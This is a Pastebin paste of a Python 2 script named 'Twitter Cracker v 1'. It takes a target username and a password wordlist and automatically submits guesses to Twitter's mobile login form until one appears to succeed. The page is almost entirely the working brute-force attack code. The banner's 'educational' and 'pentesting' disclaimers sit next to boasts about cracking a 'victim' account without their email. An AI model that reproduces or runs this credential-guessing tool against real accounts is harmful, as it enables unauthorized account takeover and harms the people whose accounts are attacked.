Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2018
1,487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.72 KB | None | 0 0
  1. #!usr/bin/python
  2. #Twitter Cracker Version 1 can crack into Twitter Database 100% without Interruption By Firewall !
  3. #This program is for educational purposes only.
  4. #Don't attack people Twitter accounts it's illegal !
  5. #If you want to crack into someone's account, you must have the permission of the user.
  6. #Mauritania Attacker is not responsible.
  7.  
  8.  
  9. import sys
  10. import random
  11. import mechanize
  12. import cookielib
  13.  
  14.  
  15. GHT = '''
  16. +=======================================+
  17. |..........Twitter Cracker v 1..........|
  18. +---------------------------------------+
  19. |#Author: Bingo Bongo |
  20. |#Contact: In Ya Bum |
  21. |#Date: 07/17/2018 |
  22. |#This tool is made for pentesting. |
  23. |#Eat Ass and Smoke Grass |
  24. |Big Vouch For Aye Lmao |
  25. |#Respect Bing Bong |
  26. |#I take no responsibilities for the |
  27. | use of this program ! |
  28. +=======================================+
  29. |..........Twitter Cracker v 1..........|
  30. +---------------------------------------+
  31. '''
  32. print("Note: - This tool can crack Twitter account even if you don't have the email of your victim")
  33. print("# Hit CTRL+C to quit the program")
  34.  
  35.  
  36.  
  37. username = str(raw_input("# Enter |Username| Twitter : "))
  38. passwordlist = str(raw_input("Enter the name of the password list file : "))
  39.  
  40. useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
  41.  
  42.  
  43.  
  44. login = 'https://mobile.twitter.com/session'
  45. def attack(password):
  46.  
  47. try:
  48. sys.stdout.write("\r[*] trying %s.. " % password)
  49. sys.stdout.flush()
  50. br.addheaders = [('User-agent', random.choice(useragents))]
  51. site = br.open(login)
  52. br.select_form(nr=0)
  53.  
  54.  
  55.  
  56.  
  57. ##Twitter
  58. br.form['username'] = username
  59. br.form['password'] = password
  60. br.submit()
  61. log = br.geturl()
  62. if log != login:
  63. print("\n\n\n [*] Password Twitter found .. !!")
  64. print("\n [*] Password : %s\n") % (password)
  65. sys.exit(1)
  66. except KeyboardInterrupt:
  67. print("\n[*] Exiting program .. ")
  68. sys.exit(1)
  69.  
  70. def search():
  71. global password
  72. for password in passwords:
  73. attack(password.replace("\n",""))
  74.  
  75.  
  76.  
  77. def check():
  78.  
  79. global br
  80. global passwords
  81. try:
  82. br = mechanize.Browser()
  83. cj = cookielib.LWPCookieJar()
  84. br.set_handle_robots(False)
  85. br.set_handle_equiv(True)
  86. br.set_handle_referer(True)
  87. br.set_handle_redirect(True)
  88. br.set_cookiejar(cj)
  89. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  90. except KeyboardInterrupt:
  91. print("\n[*] Exiting program ..\n")
  92. sys.exit(1)
  93. try:
  94. list = open(passwordlist, "r")
  95. passwords = list.readlines()
  96. k = 0
  97. while k < len(passwords):
  98. passwords[k] = passwords[k].strip()
  99. k += 1
  100. except IOError:
  101. print("\n [*] Error: check your password list path \n")
  102. sys.exit(1)
  103. except KeyboardInterrupt:
  104. print("\n [*] Exiting program ..\n")
  105. sys.exit(1)
  106. try:
  107. print (GHT)
  108. print(" [*] Account to crack : %s") % (username)
  109. print(" [*] Loaded :") , len(passwords), "passwords"
  110. print(" [*] Cracking, please wait ...")
  111. except KeyboardInterrupt:
  112. print("\n [*] Exiting program ..\n")
  113. sys.exit(1)
  114. try:
  115. search()
  116. attack(password)
  117. except KeyboardInterrupt:
  118. print("\n [*] Exiting program ..\n")
  119. sys.exit(1)
  120.  
  121. if __name__ == '__main__':
  122. check()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement